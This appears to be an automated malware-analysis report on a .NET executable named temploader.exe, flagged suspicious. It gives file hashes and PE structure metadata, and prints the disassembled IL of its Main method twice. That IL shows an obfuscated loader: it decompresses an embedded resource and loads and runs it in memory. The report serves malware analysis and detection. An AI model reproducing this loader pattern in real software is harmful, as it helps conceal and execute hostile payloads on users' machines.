Suspicious
Suspect

bb5867fd9a72c96717ecae61e75e426c

PE Executable
|
MD5: bb5867fd9a72c96717ecae61e75e426c
|
Size: 1.55 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Medium

Hash
 Hash Value
MD5
bb5867fd9a72c96717ecae61e75e426c
Sha1
4c61c08e4d5f1ae192920bcfffbd6976345ec07a
Sha256
f66a4ee15f672bbf9259027eb286f369bfa81a3aa979f547415b831d22d031b5
Sha384
b819725931be56874954411065452a7a0c594f59ea5b69c7a2f9023bfbc4f6b2155cbc06368ee218d7c41bcd04681a8f
Sha512
6d00bce15c2ee0b136f4f78c9f21049641413d6dce3baf2d582c22105fbc8cc803af481c294ddffecde558647f396ca66a01c5a4ccea47d7d10d473aa404cef7
SSDeep
24576:67/IRl0i+euB1tRwbyRNHZXva9fcZq0CQkaTAfVq05pmT1W5kaSa0csy49LnA3/B:lRl8RtRbFE0CQ7TIVUBW5Qamy4tAvI6
TLSH
94753327E16918C3D2109DBB8D1DD5C9283B769B22DFDEB575A12EF65E800242CEF60C

PeID

Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
File Structure
bb5867fd9a72c96717ecae61e75e426c
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
a
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

temploader.exe
Full Name

temploader.exe
EntryPoint

System.Void a.a::Main()
Scope Name

temploader.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

temploader
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

3
Main Method

System.Void a.a::Main()
Main IL Instruction Count

37
Main IL

call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldstr WrgCr77Rz1wYMcvScheNgQ== ldstr v8H0mJxMg+dMI12z6rkjE7GLmTC11gWQVhBWpJ7SeVY= ldstr 50R07FlUfAM7cxEDrWJsLQ== call System.String 鍑橈柍⬺鰍៾�痎::埥I⤔䔘࿸蚎쭦摗(System.String,System.String,System.String) callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.0 <null> newobj System.Void System.IO.MemoryStream::.ctor() stloc.1 <null> ldloc.0 <null> ldc.i4.0 <null> newobj System.Void System.IO.Compression.DeflateStream::.ctor(System.IO.Stream,System.IO.Compression.CompressionMode) stloc.2 <null> ldloc.2 <null> ldloc.1 <null> callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) leave IL_0046: ldloc.1 ldloc.2 <null> brfalse IL_0045: endfinally ldloc.2 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> callvirt System.Byte[] System.IO.MemoryStream::ToArray() call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave IL_0070: ret ldloc.0 <null> brfalse IL_006F: endfinally ldloc.0 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null>
Module Name

temploader.exe
Full Name

temploader.exe
EntryPoint

System.Void a.a::Main()
Scope Name

temploader.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

temploader
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

3
Main Method

System.Void a.a::Main()
Main IL Instruction Count

37
Main IL

call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldstr WrgCr77Rz1wYMcvScheNgQ== ldstr v8H0mJxMg+dMI12z6rkjE7GLmTC11gWQVhBWpJ7SeVY= ldstr 50R07FlUfAM7cxEDrWJsLQ== call System.String 鍑橈柍⬺鰍៾�痎::埥I⤔䔘࿸蚎쭦摗(System.String,System.String,System.String) callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.0 <null> newobj System.Void System.IO.MemoryStream::.ctor() stloc.1 <null> ldloc.0 <null> ldc.i4.0 <null> newobj System.Void System.IO.Compression.DeflateStream::.ctor(System.IO.Stream,System.IO.Compression.CompressionMode) stloc.2 <null> ldloc.2 <null> ldloc.1 <null> callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) leave IL_0046: ldloc.1 ldloc.2 <null> brfalse IL_0045: endfinally ldloc.2 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> callvirt System.Byte[] System.IO.MemoryStream::ToArray() call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave IL_0070: ret ldloc.0 <null> brfalse IL_006F: endfinally ldloc.0 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null>
bb5867fd9a72c96717ecae61e75e426c (1.55 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙